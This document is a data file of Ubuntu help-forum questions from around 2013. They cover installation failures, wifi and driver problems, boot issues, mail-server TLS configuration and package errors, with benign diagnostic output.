371808	sharing laptops wifi internet to desktop via ethernet	i 'm running ubuntu 13.10 on a dell inspiron 530s . it has a linksys network adapter card , but i do not have the adapter , so my computer is connection-less . what i 'd like to know is if there is a way to share the internet that my wireless laptop is receiving through an ethernet cord to give internet to my desktop computer . the laptop is a compaq presario cq56 , running windows 8 . any answer is well appreciated .
371809	run tomcat7 as tomcat7 ( or any other ) user	what will be the recommended way to ensure that a tomcat7 instance is running as the tomcat7 ( or any other ) user ? i suppose that i can modify tomcat7-instance/bin/startup.sh and tomcat7-instance/bin/shutdown.sh and add 'su tomcat7 ' at the top . in tomcat6 i think it was the environment variable tomcat6_user .
371814	reloading my os on my laptop	how do i install ubuntu on a formatted hard drive so that when re installed into my laptop the computer boots in ubuntu .
371819	ca n't install ubuntu on windows xp ?	i have a dimension e310 desktop computer that i wanted to install ubuntu on . i got the bootable usb and inserted it and all seemed to be going well , when i reached the boot options i obviously selected boot from usb . when i got the the selection menu however , i selected install ubuntu . the screen went black and i then found myself with a blinking cursor for about 5 seconds . afterwards , the screen went black again and then went straight back to the bios ! i 've tried this several times and the same result occurs . any help will be appreciated . thanks !
371825	how can i add shortcuts to second docky dock on second monitor ?	i just created two docks in both my monitors . i expected the second docky dock also to show running apps . but its not showing . i even ca n't add shortcuts to it . what might be the issue ?
371829	youtube videos say : `` this video is currently unavailable . '' when using chrome	i 've seen a few similar questions on the web , but none of them solve the problem for me . essentially random youtube videos wo n't play in the chrome browser , but work in firefox just fine . sometimes they even work in chrome on a website that displays the video still hosted at youtube , but wo n't work if i visit the actual youtube page ! ubuntu 12.04.3 lts chromium : version 30.0.1599.114 ubuntu 12.04 ( 30.0.1599.114-0ubuntu0.12.04.3 ) chromium plugin : shockwave flash 11.2 r202 here 's a few things i 've already tried : uninstall and reinstall all flash packages disable all other chromium plugins ( vlc , divx , etc . ) youtube html5 trial ( in/out ) using an extension to change my user agent to not chrome on ubuntu any help would be greatly appreciated , as i have n't found anyone else with such a persistent problem !
371832	how can run sudo commands inside another user , or grant a user the same privileges as an admin ?	noob here , so just please tell me if this is stupid . apologies also if the jargon in the title is a little off . here 's my problem . i have a user , postgres which i use for all tasks involving the postgres database server . however , i 'm constantly running into permission denied when running scripts in postgres . i have to keep logging out of postgres , chowning certain directories to postgres , and , obviously maybe , you ca n't run sudo when inside postgres . if i do ubuntu gives me this message : postgres is not in the sudoers file . this incident will be reported . kinky . how can i run sudo inside postgres or give postgres more privileges ?
371833	networking & bind9 server configuration	apologize in advance ... . bit new on managing all this , but i 've got a networking and bind dns configuration question : root company domain ( foobar.com ) dns is managed by domain register office.foobar.com is routing to office network , which has master/slave bind9 dns servers office voip pbx hostname needs to be registered to the root domain ( pbx.foobar.com ) and has two nics : eth0 is assigned a global static ip for connectivity between pbx & it 's voip gateways , as well as external extensions registering to the pbx pbx.foobar.com dns a/cname records on foobar.com register point to this eth1 is assigned a local lan ip for local extensions on the office.foobar.com domain to register to , as well as managing the system locally without having to go outside to the office wan since all extensions need to register to pbx.foobar.com , how do i setup the office.foobar.com dns to route internal extension connections to the server 's eth1 ? is there a means of declaring an a record in a subdomain dns to a foobar.com host 's local ip ?
371841	ubuntu server 12.1 cdrom issues after install	after successfully installing ubuntu server 12.1 from an iso on a cd . now the problem is this : cdrom can be located manually , how ever it says that the dir does n't exist . i get this : root @ pxe : /dev # cd /cdrom/ -bash : cd : /cdrom/ : no such file or directory i know where the cd is , but we can not cd into the dir . we are trying to set up a dhcp server on a dell poweredge r210 . the dhcp is working . however my only issue is that i can not get ubuntu server to recognize the cdrom to gain access to one file i need which is pxelinux.o if you need more info let me know .
371844	ubuntu on an asus transformer prime ?	can ubuntu be put on a tablet that currently has android on it ( instead of android ) ? i have a tablet ( asus transformer prime ) that i would like to play with tech-wise and i wanted to know if there is a way i can get ubuntu on it , so that i could use it with ros to do robot design/programming .
371846	how do i fix postfix tls ?	note while all of this down below may be educational , it turns out that my entire problem was not with postfix , but with my isp . i actually switched isps in the time in question , and my new one is intercepting and rewriting unencrypted smtp traffic in a way that explicitly breaks starttls . i worked around the problem by setting up a tls-only connection on port 465 . starttls was working with my system earlier today . without me altering the system in any way , it spontaneously broke . i 've now been trying to fix it for a couple of hours , to no success . when i connect to the server , this is what i get : savanni @ orolo : ~ $ telnet apps.savannidgerinel.com 25 trying 129.121.182.135 ... connected to apps.sasavanni @ orolo : ~ $ telnet apps.savannidgerinel.com 25 trying 129.121.182.135 ... connected to apps.savannidgerinel.com . escape character is '^ ] ' . 220 *********************************************** ehlo dude 250-apps.savannidgerinel.com 250-pipelining 250-size 10240000 250-vrfy 250-etrn 250-xxxxxxxa 250-auth plain 250-enhancedstatuscodes 250-8bitmime 250 dsn ^ ] close telnet > close connection closed . okay , obviously starttls is n't present in this list . so i 've been digging through my configuration files and working through the tutorials again , and that has done me no good at all . here 's my tls-related configuration : smtp_tls_cafile = /etc/ssl/certs/savannidgerinel_com_ca.pem smtp_tls_cert_file = /etc/ssl/certs/apps.savannidgerinel.com.pem smtp_tls_key_file = /etc/ssl/private/apps.savannidgerinel.com.key.pem smtp_tls_security_level = may smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtpd_tls_cafile = /etc/ssl/certs/savannidgerinel_com_ca.pem smtpd_tls_cert_file = /etc/ssl/certs/apps.savannidgerinel.com.pem smtpd_tls_key_file = /etc/ssl/private/apps.savannidgerinel.com.key.pem smtpd_tls_loglevel = 3 smtpd_tls_received_header = yes smtpd_tls_security_level = may smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache tls_random_source = dev : /dev/urandom all of the certificate files are present , the server private key is present , the server ca is present , and the smtpd_scache.db and smtp_scache.db files are both present . all are accessible to the postfix user . speaking of which , here are the processes running : savanni @ apps : /var/lib/postfix $ ps aux | grep postfix root 3525 0.0 0.1 25112 1680 ? ss 20:19 0:00 /usr/lib/postfix/master postfix 3526 0.0 0.1 27176 1524 ? s 20:19 0:00 pickup -l -t fifo -u -c -o content_filter= -o receive_override_options=no_header_body_checks postfix 3527 0.0 0.1 27228 1552 ? s 20:19 0:00 qmgr -l -t fifo -u postfix 3528 0.0 0.4 46948 4144 ? s 20:19 0:00 smtpd -n smtp -t inet -u -c -o stress= -s 2 postfix 3529 0.0 0.1 27176 1628 ? s 20:19 0:00 proxymap -t unix -u postfix 3530 0.0 0.3 38212 3176 ? s 20:19 0:00 tlsmgr -l -t unix -u -c postfix 3531 0.0 0.1 27176 1516 ? s 20:19 0:00 anvil -l -t unix -u -c postfix 3535 0.0 0.1 27188 1544 ? s 20:20 0:00 trivial-rewrite -n rewrite -t unix -u -c the log files say absolutely nothing related to tls except for this : nov 6 02:19:45 apps postfix/master [ 3525 ] : daemon started -- version 2.9.6 , configuration /etc/postfix nov 6 02:19:49 apps postfix/smtpd [ 3528 ] : initializing the server-side tls engine nov 6 02:19:49 apps postfix/tlsmgr [ 3530 ] : open smtpd tls cache btree : /var/lib/postfix/smtpd_scache nov 6 02:19:49 apps postfix/tlsmgr [ 3530 ] : tlsmgr_cache_run_event : start tls smtpd session cache cleanup nov 6 02:19:49 apps postfix/smtpd [ 3528 ] : connect from unknown [ 204.16.68.108 ] neither syslog nor mail.err shows any indication of a problem . as far as the whole system is concerned , all is well . but there is no starttls and so i suddenly ca n't send any email at all . help ? ? ?
371847	which version for my netbook acer v5=121	2gb ram 500 gb hdd amd c- 70 , 1 ghz wireless , touch pad functions which version is better
371856	metro : last light on linux , multimonitor stuck to left monitor	so it seems to be running good , fast , stable but as i run a multi-monitor system , how do i ... ubuntu 13.10 , radeon 7970 , flgrx-updates ( propietary ) drivers a : run in eyefinity mode ? or b : run the game on my centre monitor .
371857	problem installing bitcoin	i added the ppa and did sudo apt-get update sudo apt-get install bitcoin-qt i get an error : some packages could not be installed ... the following packages have unmet dependencies : bitcoin-qt : dpeends : libboost-filesystem1.46.1 ... but it is not installable ... i tried sudo apt-get install libboost-filesystem but got unable to locate package what does this mean ? how to fix it ? ubuntu 12.04
371864	my computer keeps restarting when i try to install ubuntu . why ?	i 've tried both 13.10 and 12.04 lts but neither work . i can get it to boot from my usb , and i go through the process like normal up until the point where i select `` install inside windows 7 '' and click continue , then it restarts my system . why does this happen and how do i fix it ?
371867	bootloader install failed	i have lenovo u510 with windows 8 . this ultrabook has 24gb ssd and i tried to install ubuntu 12.04.3 in it . i changed bios from uefi to legacy and i used a livedvd . i created a 17gb partition when i was in windows from this ssd and i tried both manualy or with the install alongside but was allways without success because bootloader install failed and was unable to install grub . i tried also to use the recommended repair from boot-repair but it says that my laptop can only with uefi boot . i changed it but the same thing happens my laptop boot in windows 8 . how to fix this ?
371868	how can i prevent the browser from switching monitors when a link is clicked on another workspace under 13.10 ?	i 'm getting some weird behaviour in 13.10 with the following setup : two monitors three workspaces chromium on monitor # 2 in workspace # 1 thunderbird on monitor # 2 in workspace # 3 when i click a link in thunderbird ( or in any app while i 'm not on workspace # 1 ) , chromium will have moved to monitor # 1 by the time i switch over there . it does n't happen while chromium is on monitor # 1 , so i can work around this if need be , but if i need to live with this i 'd really prefer that it was the other way round and chromium was moving to the right monitor . this may or may not be a bug . if not , how can i fix this ?
371869	ubuntu 13.10 ( saucy salamander ) error . download incomplete	i downloaded 13.10 a couple of days ago and have been getting the kernel panic not syncing vfs mount root ( 0,0 ) message . apparently , the 13.10 was n't downloaded fully and i got this . can anyone tell me how can i fix this without reinstalling and erasing my hard drive ? reading package lists ... done w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/saucy/inrelease w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/saucy-security/inrelease
371870	odd start up , blank then error , then quick boot 13.10	when i boot up sometimes i get : bios , blank purple screen for a bit , a black screen with printed on it : [ 10.838171 ] info 0w1_cfg80211_attach : registered cfg80211 phy then the orange dot ubuntu load screen that goes quickly . is this normal ? should it be the white dot ubuntu logo load screen the whole time ? i 've recently wiped my entire drive ( dban autonuke ) from having ubuntu and windows to just ubuntu . also i frequently get freezes in situations and have to hard reboot . how do i know badly my hard rebooting has damaged my drive , how do i/can i fix it ? it happens when i use the f-keys to adjust my brightness , i stopped using them . it happens when i sudo halt from the command line , sudo reboot works fine though . and it happened a lot with ubuntu live usb 's i was using and using gparted . another side question , i think i enabled lvm on my most recent installation , how do i check ?
371872	how come i can not adjust mouse sensitivity on ubuntu 13.10 ?	i have installed the desktop version with all of its defaults . currently , my mouse is a wireless logitech k & m combo that is connected through a kvm switch . when going to the mousepad and trackpad settings , all i see is general settings that include primary button configuration and double click speed . there is no sensitivity option . i would like to increase my pointer speed . how can i do this ?
371875	wifi range problem ( ubuntu 13.10 )	i recently installed ubuntu 13.10 to dual-boot with windows . while wifi is completly fine on windows and i can access it anywhere in my house , it 's absolutety not the case on ubuntu . as soon as i 'm not near my router , the wifi is out of range and i ca n't select it anymore . the only times it worked , it lost connection < 1 minute later . my wifi card is a qualcomm atheros ar9285 , if necessary . any help would be appreciated a lot , thanks .
371876	using mac to create bootable usb stick for windows	what directions should i be following to use my friends mac to create a bootable usb stick for an old hp pavilion dv4 ? the hp pavilion does n't seem to have any operating system , it tries to boot windows but it 's 'missing ' something and tells me i need to install windows , but i 'd rather install ubuntu . please help me !
371879	how to manage wifi clients in ubuntu ?	i 'm looking for an application to manage clients who are connected to my wifi . that application what i can see online clients , and can disconnect them after example 1 hour..is there any application to do this in ubuntu ? in other work..is there any command in ubuntu i disconnect clients by their ip address after 1 hour ?
371880	when i try to configure pbc library i receive this error	jec @ jec : ~/cpabe/pbc-0.5.14 $ ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk ... ... ... ... . ... ... ... ... ... checking whether ln -s works ... yes checking whether make sets $ ( make ) ... ( cached ) yes checking for flex ... no checking for lex ... no ************************ flex not found ************************
371882	my laptop is running very slow when i installed ubuntu	i recently installed ubuntu on my laptop , i have a pretty decent configuration that supports windows 8 very fluently but ubuntu lags a lot while operating . this is my laptop 's configuration : processor intel i5-2430m clock speed 2.4 ghz cores 2 cores instruction set 64 bit memory bandwidth 21.3 gb/s number of threads 4 memory ram included 6 gb ram possible 8 gb ram type ddr3 ram speed 1,333 mhz
371883	hp laptop installation problem : `` the system is running in low-graphics mode ''	i have hp laptop with 4gb ram and 1gb amd radeon graphics . i installed ubuntu 13.10 . after the installation system restarts and stuck with the message `` the system is running in low-graphics mode '' .
371885	problem with 3g modem in ubuntu 13.10	i install gnome 3.10 in ubuntu 13.10 , after the installation the modem stop running , now i ca n't connect to the internet . what can i do ? or what could be the problem ?
371886	what is `` task '' in the output of `` apt-cache show package_name '' ?	when i run apt-cache show inkscape , the bottom of the output has : description-md5 : fed6589659211fb40b80d03dda6e5675 homepage : http : //www.inkscape.org/ description-md5 : fed6589659211fb40b80d03dda6e5675 bugs : https : //bugs.launchpad.net/ubuntu/+filebug origin : ubuntu supported : 9m task : ubuntu-usb , edubuntu-desktop-gnome , edubuntu-usb , ubuntustudio-video , ubuntustudio-graphics but when i run apt-cache show pdfgrep , the line beginning with task is absent : description-md5 : 8c8a5397f782d81d957740280eb8f352 homepage : http : //pdfgrep.sourceforge.net/ description-md5 : 8c8a5397f782d81d957740280eb8f352 bugs : https : //bugs.launchpad.net/ubuntu/+filebug origin : ubuntu why is the line beginning with task present for some packages and not for others ?
371889	combine two harddrives to one operating system	good morning , i have a simple question where i was not able to find a personal solution : i have a triple boot system at the moment where i run ubuntu 12.04 unity 64b on a 2tb wd ubuntu studio 12.04 with xfce 64b on a 2tb wd centos 6.4 on a 320gb wd i was thinking about to combine both ubuntu flavours to one operating system under 12.04 with unity only but dont want to mess around and loose my music apps installed on my studio harddrive . is there any way to combine both ubuntu flavours and get one systen with 12.04 unity ?
371891	kismet config edit on ubuntu 13.04	i am having issue running kismet , i installed it and my wireless adapter for my laptop , could you please assist how should i configure . whenever i start kismet i get ( connection refused error ) . thank you
371894	how to use transmission on eth0 and web traffic on wlan0	i have a desktop computer with two interfaces , ethernet connected to cable modem and wireless connected to a dsl modem . i would like to use the ethernet connection for transmission and the wireless connection for web browsing , but if the wireless connection fails i would like to change it to the ethernet , either manually or if possible automatically . so far from what i read it seems like it 's not possible , but the questions do n't seem to apply specifically to what i want to do . i use firefox and transmission , but willing to change around as/if required . i am currently using ubuntu 13.04 64 bit , intel board with i5 . i am trying to learn as much as possible about terminal commands and creating scripts but most of the stuff i read i do n't understand yet so i would say i 'm somewhere between beginner to intermediate in linux usage . thanks in advance for all the help x_x
371897	failed upgrade 13.04 to 13.10	tried upgrading to ubuntu 13.10 from 13.04 . packages downloaded but then the whole process stopped . tried to cancel and now my computer does not boot up .
371899	encrypted computer , failed upgrade	i recently installed ubuntu 13.04 and when asked if i wanted to encrypt everything via the easy , automated process , i said yes . flash forward two months , and i was asked whether i wanted to upgrade to 13.10 , and i said yes . something went sour with the upgrade , and now my computer wo n't boot . i really need to access the files on the hard drive , and am not sure how to do this , and can not find anything that says how to do that . i saved the key for unlocking the computer and for accessing my encrypted home directory , but ca n't seem to figure out how to put this information together to access my files . any suggestions ?
371900	metasploit ( install )	hey i was installing metasploit on my laptop , suddenly i accidentally remove/moved the plug . so my laptop turned off . when i reinstall metasploit , this is what i get my question is , how can i kill or stop 7337 port to install metasploit , or maybe uninstall metasploit completely . anyway i deleted /opt/metasploitxxx so the unistaller was gone . thanks..
371901	getting internal server error while accessing the libindicate documentation !	i 'm building an indicator app and i 'm trying to connect to http : //developer.ubuntu.com/api/ubuntu-12.04/c/indicate/ for getting reference documentation . however it gives me the internal server error , so i 'm currently blocked by that . would you tell me if the documentation is available elsewhere and if there 's any plan to fix this problem ?
371903	package installation uninstallation error	for last few days , whatever software installtion/uninstallation i do with apt-get/software center it is getting ended up with message : setting up initramfs-tools ( 0.103ubuntu0.8 ) ... update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.8.0-32-generic e : /usr/share/initramfs-tools/hooks/fuse failed with return 1. update-initramfs : failed for /boot/initrd.img-3.8.0-32-generic with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : initramfs-tools e : sub-process /usr/bin/dpkg returned an error code ( 1 ) but the installtion/uninstalltion of softwares seems to be happen successfully . could anyone suggest a possible fix for this ? thanks
371904	firefox on wine crashes on startup on ubuntu	first , let 's explain why i want firefox under wine , and not the firefox that is shipped out of the box with ubuntu . i want to use firefox under wine because i want to use the widevine addon , which is `` at this time not available for linux '' . here is what i did so far to install and use firefox on wine . on ubuntu 12.04 lts , i just installed wine like that : sudo apt-get update ; sudo apt-get install wine then i downloaded the windows installer for firefox from the mozilla website . i ran the firefox setup 25.0.exe file with wine but at the end of the install process when launching firefox , i got a window notifying me that the program at crashed . i ran firefox from the command line with wine , to get an idea of what could have went wrong : wine /home/myuser/.wine/drive_c/program\ files/mozilla\ firefox/firefox.exe fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : process : setprocessdeppolicy ( 1 ) : stub fixme : iphlpapi : notifyaddrchange ( handle 0x368e8fc , overlapped 0x368e8e0 ) : stub fixme : winsock : wscgetproviderpath ( { e70f1aa0-ab8b-11cf-8ca3-00805f48a192 } 0x44fe6f8 0x44fe6b8 0x44fe6e4 ) stub ! fixme : advapi : registertraceguidsw ( 0x1b0e290 , 0x39ead80 , { 509962e0-406b-46f4-99ba-5a009f8d2225 } , 3 , 0x3974d00 , ( null ) , ( null ) , 0x39eadb0 , ) : stub fixme : winsock : wscgetproviderpath ( { e70f1aa0-ab8b-11cf-8ca3-00805f48a192 } 0x44fe6f8 0x44fe6b8 0x44fe6e4 ) stub ! fixme : winsock : wscgetproviderpath ( { 11058240-be47-11cf-95c8-00805f48a192 } 0x44fe6f8 0x44fe6b8 0x44fe6e4 ) stub ! fixme : winsock : wscgetproviderpath ( { 11058241-be47-11cf-95c8-00805f48a192 } 0x44fe6f8 0x44fe6b8 0x44fe6e4 ) stub ! fixme : winsock : wscgetproviderpath ( { 11058241-be47-11cf-95c8-00805f48a192 } 0x44fe6f8 0x44fe6b8 0x44fe6e4 ) stub ! fixme : ntdll : ntlockfile i/o completion on lock not implemented yet fixme : advapi : setnamedsecurityinfow l '' c : \\users\\myuser\\application data\\mozilla\\firefox\\profiles\\cn4oy6kh.default\\extensions.ini '' 1 536870916 ( nil ) ( nil ) 0x13d40c ( nil ) fixme : imm : immreleasecontext ( 0x20022 , 0x13e850 ) : stub fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x32ee18,0x00000000 ) , stub ! fixme : shell : applicationassociationregistration_querycurrentdefault ( 0x143b50 ) - > ( l '' webcal '' , 1 , 1 , 0x32c7a0 ) fixme : shell : applicationassociationregistration_querycurrentdefault ( 0x143b50 ) - > ( l '' ircs '' , 1 , 1 , 0x32c7a0 ) fixme : shell : applicationassociationregistration_querycurrentdefault ( 0x143b50 ) - > ( l '' mailto '' , 1 , 1 , 0x32c7a0 ) fixme : shell : applicationassociationregistration_querycurrentdefault ( 0x143b50 ) - > ( l '' irc '' , 1 , 1 , 0x32c7a0 ) fixme : alsa : audiosessioncontrol_setgroupingparam ( 0x153050 ) - > ( { 7b0a93ee-05e7-4576-9cc5-64fdf201f303 } , ( null ) ) - stub fixme : alsa : audiosessioncontrol_setgroupingparam ( 0x153050 ) - > ( { 00000000-0000-0000-0000-000000000000 } , ( null ) ) - stub fixme : alsa : audiosessioncontrol_unregisteraudiosessionnotification ( 0x153050 ) - > ( 0x6311880 ) - stub wine : call from 0x7b839cf2 to unimplemented function dwmapi.dll.dwmgetcompositiontiminginfo , aborting fixme : dbghelp : elf_search_auxv ca n't find symbol in module unfortunately i do n't know what to do from there on ...
371907	ubuntu 12.10 wo n't use dhcp static lease from my router	i have a buffalo router running dd-wrt ( came stock from the factory with it ) . i have a dhcp static lease setup for my computer which dual boots windows 7 and ubuntu 12.10 . when running windows , there is no problem getting the ip address i assigned in the static lease . however , when booting ubuntu , it refuses to get the ip address i assigned and just gets the first available dhcp address . obviously the mac address is the same and the hostname is also set the same though i do n't think hostname is used by the router . this is not just isolated to one ubuntu machine on my network . my usual fix it to just configure the ubuntu machine with a fixed ip address that matches the static lease address , but i found on this machine that is causing a problem with ssh connections dropping every few minutes ( different issue , different question to come ) . so , why does it seem every ubuntu machine i have wo n't get the static lease address automatically and is there something i can do to fix it ?
371909	kubuntu installer fails while booting from usb-stick	problem : while i tried to install kubuntu from usb-stick it gives me a black screen . not totally , it displays one character , a dash . it 's preflashing . by the way , before there 's a black screen it displays the menu of the kubuntu installer right . i tried : i tried to install elemenaryos , same problem , ubuntu , same problem . i tried to install the .iso file on a usb-stick with different programs : unetbootin and the standard from ubuntu 12.04 . the computer already runs on ubuntu 12.04 , and i already have many linux distro 's installed on the same computer ( not installed anymore , i deinstalled them before i tried another one ) . so i had no problems before . everything was fine .
371910	what is an alternative for `hwinfo` that shows the vbe supported modes ?	in saucy , hwinfo has been deprecated and is not available in the repositories . what is an alternate way to figure out the available vbe modes like in the output of hwinfo -- framebuffer without going to grub and running vbeinfo ? i 'm not sure what the tag ( s ) should be for this question .
371912	my wireless connection keeps disconnection every few minute !	i installed ubuntu 13.10 and ran the following commands to enable my wireless card : sudo apt-get update sudo apt-get install firmware-b43-installer after enabling the wireless driver i get disconnected every 2 , 3 minutes and it 's damn annoying . how do i fix this problem . by the way , this is the output of lspci command : 00:00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 0c ) 00:01.0 pci bridge : intel corporation mobile pm965/gm965/gl960 pci express root port ( rev 0c ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 2 ( rev 02 ) 00:1c.3 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 4 ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev f2 ) 00:1f.0 isa bridge : intel corporation 82801hm ( ich8m ) lpc interface controller ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller ( rev 02 ) 00:1f.2 sata controller : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ahci mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation 82801h ( ich8 family ) smbus controller ( rev 02 ) 01:00.0 vga compatible controller : nvidia corporation g84m [ geforce 8600m gt ] ( rev a1 ) 03:00.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) 03:01.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller ( rev 05 ) 03:01.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 22 ) 03:01.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 12 ) 03:01.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 12 ) 0c:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 )
371913	system init daemons do not show even if `` initctl '' is executed with `` sudo . ''	i 'm using ubuntu 13.10 . today , it became impossible to control php5-fpm daemon from the shell like the following : $ sudo service php5-fpm start start : unknown job : php5-fpm after several hours of investigation , i 've found that the two code output different list of daemons : $ initctl -- system list $ sudo initctl list while the former outputs the complete long list of system init daemons , the latter merely outputs the user 's init daemons , which is exactly the same as initctl list without sudo . the official release notes say they will return the same output . that is , the latter should return the output of the former . and it was the reason of the error . does anyone know the cause of this problem ?
371915	how to restart unity-panel-service	sometimes , the unity panel just stops working , meaning i ca n't access any menus for the programs i 'm running . i know i can probably log in/out but that really puts an uncomfortable hickup in my work flow . how can i restart unity-panel when it stops working ?
371917	how to compile with fastformat which using stlsoft ?	how to compile with fastformat which using stlsoft ? after unzip fastformat-0.7.1-alpha-9 in local directory and compile gcc with make and then unzip stlsoft in local directory and set etc/environment is it possible to write own fastformat instead of using library ? path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games '' stlsoft= '' /home/martin/downloads/stlsoft-1.9.117 '' fastformat_root= '' /home/martin/downloads/fastformat-0.7.1-alpha-9 '' in file included from /home/martin/downloads/stlsoft-1.9.117/include/stlsoft/memory/allocator_features.hpp:65:0 , from /home/martin/downloads/stlsoft-1.9.117/include/stlsoft/memory/allocator_selector.hpp:74 , from /home/martin/downloads/stlsoft-1.9.117/include/stlsoft/string/shim_string.hpp:75 , from /home/martin/downloads/fastformat-0.7.1-alpha-9/include/fastformat/inserters/real.hpp:70 , from /home/martin/downloads/fastformat-0.7.1-alpha-9/include/fastformat/inserters/to_e.hpp:65 , from server.c:8 : /home/martin/downloads/stlsoft-1.9.117/include/stlsoft/util/std/library_discriminator.hpp:82:72 : fatal error : iterator : no such file or directory compilation terminated . martin @ martin-virtualbox : ~/downloads/livefeedserver $ gcc -g server.c -lzmq -pthread -o server -i/home/martin/downloads/fastformat-0.7.1-alpha-9/include -i/home/martin/downloads/stlsoft-1.9.117/include -i/home/martin/downloads/stlsoft-1.9.117/include/stlsoft/util/std
371920	how to upgrade qt creator ?	i just installed qt creator 2.4.1 ( based on qt 4.8.0 64bit ) from ubuntu software center and noticed that it was not the latest version . how do i upgrade it from terminal ? my ubuntu is 12.0.4lts . thanks . hc .
371921	bootable usb stick for ubuntu 13.04 using windows	i 've crashed my ubuntu13.04 laptop when trying to upgrade to 13.10 . unfortunately had not made a bootable cd . i 'm trying to create a bootable usb drive using another laptop running windows7 . how can i do this ?
371922	how can i get system monitor indicator to display temperature ?	system monitor indicator comes with options to display cpu load , memory usage , and other system stats , but currently does not include an option to display temperature ( of the cpu , hdd , ssd , gpu , etc. ) . there seems to be functionality built in for adding additional sensors by applying a command ( by clicking `` new '' ) . however , i do n't know how , and i can not find any documentation that describes this feature . my system is set up to report temperature as so : user @ host : ~ $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +27.8°c ( crit = +106.0°c ) temp2 : +29.8°c ( crit = +106.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +79.0°c ( high = +87.0°c , crit = +105.0°c ) core 0 : +79.0°c ( high = +87.0°c , crit = +105.0°c ) core 1 : +77.0°c ( high = +87.0°c , crit = +105.0°c ) pkg-temp-0-virtual-0 adapter : virtual device temp1 : +79.0°c this question refers to the package indicator-sysmonitor version 0.4.3 from 13.04 raring , although currently i am running it on a 13.10 saucy installation as it has not yet been updated in the ppa : https : //launchpad.net/indicator-sysmonitor
371926	no wireless in ubuntu 13.10	when i upgraded to ubuntu 13.10 , i ca n't connect to wireless . the only thing i can connect to is ethernet , so please help me , what should i do ? here is the output of the lspci -nnk | grep -i net -a2 00:19.0 ethernet controller [ 0200 ] : intel corporation 82579v gigabit network connection [ 8086:1503 ] ( rev 04 ) subsystem : acer incorporated [ ali device ] [ 1025:8000 ] kernel driver in use : e100e output of lsusb : bus 002 device 003 : id 046d : c31c logitech , inc . keyboard k120 for business bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 0bda:0152 realtek semiconductor corp. mass storage device bus 001 device 040 : id 04e8:6863 samsung electronics co. , ltd bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 004 : id 0bda:8178 realtek semiconductor corp. rtl8192cu 802.11n wlan adapter bus 003 device 003 : id 045e:070f microsoft corp . bus 003 device 002 : id 046d : c52f logitech , inc. unifying receiver bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub update ! now i can connect to my wireless but i dont have internet acces + when i reboot the wireless go away please help . thanks for the help so far : ) iwconfig : viktor @ viktor-dator : ~ $ iwconfig usb0 no wireless extensions . eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off
371927	bluetooth on acer travelmate laptop can send only , but do n't want to receive	i have a acer travelmate 5720 laptop that runs ubuntu 13.04 . it has built in bluetooth . for what i can see is that ubuntu did pick up the bluetooth and the necessary bluetooth drivers is installed . but i 'm only able to send files from this laptop to bluetooth devices , but for some reason i ca n't do the same visa verso to the laptop , for example if i try to send a file from a blackberry 9360 it ca n't send , tells me failed to find service . it kicks out . i try to find more drivers to install , tried a few in ubuntu software center , but no success . i even uninstalled all bluetooth drivers and reinstalled it , but no success , it does n't pick up any phone anymore . please assist me .
371931	any way to integrate facebook chat with empathy without going through online accounts ?	i 'm having trouble getting facebook to integrate with online accounts . personally i do n't like the idea anyway but in fedora , i could just enter my facebook username and password and was able to chat with my friends on facebook . ubuntu does n't seem to make it that easy . instead , i must sync my entire facebook account : (
